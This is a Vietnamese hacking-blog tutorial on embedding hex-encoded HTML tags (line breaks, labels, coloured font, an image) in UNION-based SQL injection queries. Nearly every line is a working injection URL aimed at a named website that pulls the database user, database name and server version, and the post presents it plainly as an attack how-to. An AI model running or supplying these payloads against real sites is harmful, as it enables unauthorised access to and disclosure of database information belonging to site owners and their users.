1. Home
  2. Hacking
  3. Hướng dẫn chèn thêm code HTML khi thực hiện SQL injection

Hướng dẫn chèn thêm code HTML khi thực hiện SQL injection

07:31
Trong hướng dẫn này mình sẽ chỉ cho bạn cách để thêm các thẻ HTML đơn giản và cách thiết kế trong các truy vấn SQL Injection của bạn

1. Thêm thẻ<br>

Thẻ<br> được sử dụng khi bạn muốn kết thúc một dòng nhưng lại không muốn bắt đầu một đoạn văn khác. Thẻ<br> sẽ tạo ra một lần xuống dòng khi bạn viết nó

Chúng ta nhìn câu lệnh trước khi thêm thẻ <br> :

http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(user(),0x3a3a,database(),0x3a3a,version()),4-- -


Thêm thẻ<br> vào (nhớ chuyển <br> sang mã hex)

http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(user(),0x3c62723e,database(),0x3c62723e,version()),4-- -

3c62723e: là mã<br> đã chuyển sang dạng mã hex


Chúng ta nhìn thấy có sự khác biệt rõ ràng

2. Tạo chú thích

Trong ví dụ này mình sẽ chú thích cho các phần user, database, version

Mã unhex:

http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(0xUSER>>,user(),0x3c62723e,0xDB>>,database(),0x3c62723e,0xVersion>>,version()),4-- -

Mã hex:

http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(0x555345523e3e,user(),0x3c62723e,0x44423e3e,database(),0x3c62723e,0x56657273696f6e3e3e,version()),4-- -

Kết quả


3. Tạo chữ màu

Mã unhex:

http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(0x<font size="4" color="green">,0xUSER>>,user(),0x</font>,0x<br>,0x<font size="4" color="red">,0xDB>>,database(),0x</font>,0x<br>,0x<font size="4" color="blue">,0xVersion>>,version(),0x</font>),4-- -

Mã hex:

http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(0x3c666f6e742073697a653d22342220636f6c6f723d22677265656e223e,0x555345523e3e,user(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e742073697a653d22342220636f6c6f723d22726564223e,0x44423e3e,database(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e742073697a653d22342220636f6c6f723d22626c7565223e,0x56657273696f6e3e3e,version(),0x3c2f666f6e743e),4-- -

Kết quả


4. Thêm hình ảnh trong SQLi

<img src="link hình">

Mã unhex

http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,0x<img src='http://vitaku.com/wp-content/uploads/2014/01/12Uzumaki-Naruto.jpg'>,4-- -

Mã hex

http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,0x3c696d67207372633d27687474703a2f2f766974616b752e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031342f30312f3132557a756d616b692d4e617275746f2e6a7067273e,4-- -

Nguồn: chinhnghia - ceh .vn

Share this Article

Subscribe via Email

Related Post

0 nhận xét

Đăng ký: Đăng Nhận xét (Atom)